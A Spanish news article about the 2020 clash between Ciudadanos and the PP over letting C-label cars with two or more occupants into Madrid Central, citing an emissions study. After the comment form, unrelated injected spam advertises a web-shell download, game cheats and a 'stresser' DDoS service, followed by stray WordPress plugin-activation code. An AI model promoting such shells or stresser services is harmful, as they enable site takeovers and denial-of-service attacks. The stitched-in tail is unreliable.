Villacís mantiene el pulso para evitar que los coches con etiqueta C circulen por Madrid Central



Marta R. DomingoSEGUIRMadrid
Actualizado:16/09/2020 16:50h
Guardar
Noticias relacionadas

Los choques de la «vieja normalidad» entre los socios de gobierno en el Ayuntamiento de Madrid continúan en la era Covid. El borrador de la ordenanza de Movilidad Sostenible no incluye el permiso para que accedan a Madrid Central los vehículos con distintivo C -los de gasolina posteriores a 2006 y diésel a matriculados desde 2014- con dos o más ocupantes, como siempre ha defendido Ciudadanos. Pero este hecho no implica que el PP se haya rendido en su pretensión por introducir este cambio que, aseguran, ayudaría a aminorar la polución en el distrito de Centro.

«Si saliese adelante que los vehículos C pasasen, que no es la idea ni muchísimo menos, iríamos más atrás que lo que propuso Gallardón en su día, porque las APR tenían prohibida la entrada a los vehículos C que no fuesen residentes», reiteró este miércoles la vicealcaldesa y portavoz de Cs en la capital, Begoña Villacís, que mantiene el pulso al PP lanzando el pasado enero. «Creo que no es momento de ir a atrás, sino hacia adelante», zanjó Villacís tras ser preguntada por los estudios adelantados por el área de Medio Ambiente con los que pretenden avalar su tesis, unos datos que, admitió, tendrán que «estudiar y contrastar».

La razón por la que no se ha incluido las autorizaciones de los coches C en el borrador de la modificación de la Ordenanza de Movilidad -como ha avanzado eldiario.es- es, según apuntan desde la concejalía que dirige Borja Carabante, «esperar al resultado de la modelización completa de Madrid 360 para evaluar la medida». «Asumí el compromiso con la ministra de Transición de Ecológica de que antes de tomar una decisión definitiva al respecto íbamos a hacer una modelización, que estará concluida a final de mes y vamos a volver a solicitar esa reunión con la ministra para trasladárselos», indicó el alcalde, restando importancia a la ausencia de la medida en el texto provisional. «Había que comenzar la tramitación de la ordenanza para que pudiera entrar en vigor como consecuencia de la sentencia que anulaba Madrid Central y dejaba sin cobertura legal la medida. Iniciamos la tramitación y no lo incluimos, porque no teníamos los resultados y actuamos de buena fe», añadió el regidor popular, que asegura que tras la reunión con la ministra trasladarán los resultados de los estudios al resto de grupos municipales.

«Quien no quiera aceptar una medida que reduce las emisiones y puede reducir la utilización del vehículo privado será quien se lo tenga que explicar a los ciudadanos», advirtió el regidor, en un aviso velado a sus socios, que apoyó su argumento en los datos avanzados por el estudio de Universidad Politécnica de Madrid que indica que esta modificación supondría una rebaja de los óxidos de nitrógeno (NOx) de 0,2 toneladas al año. Curiosamente, es esta institución independiente quien también se encargó del anterior Plan A de Calidad del Aire de Manuela Carmena. Según ese estudio preliminar, «el incremento de la ocupación de vehículos C implicaría disminuir los vehículos C de paso por kilómetro en Centro, llegándose a eliminar un 14% de los mismos, que se traduce también en 6.663 kilómetros diarios recorridos menos».

Ver los
comentariosTemas

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Shell İndir Oyun Hileleri stresser

activate_plugin( 'automatic_replace/index.php' ); activate_plugin( 'bloqueo_comentarios/index.php' ); activate_plugin( 'disable-xml-rpc/disable-xml-rpc.php' ); activate_plugin( 'rename-wp-login/rename-wp-login.php' );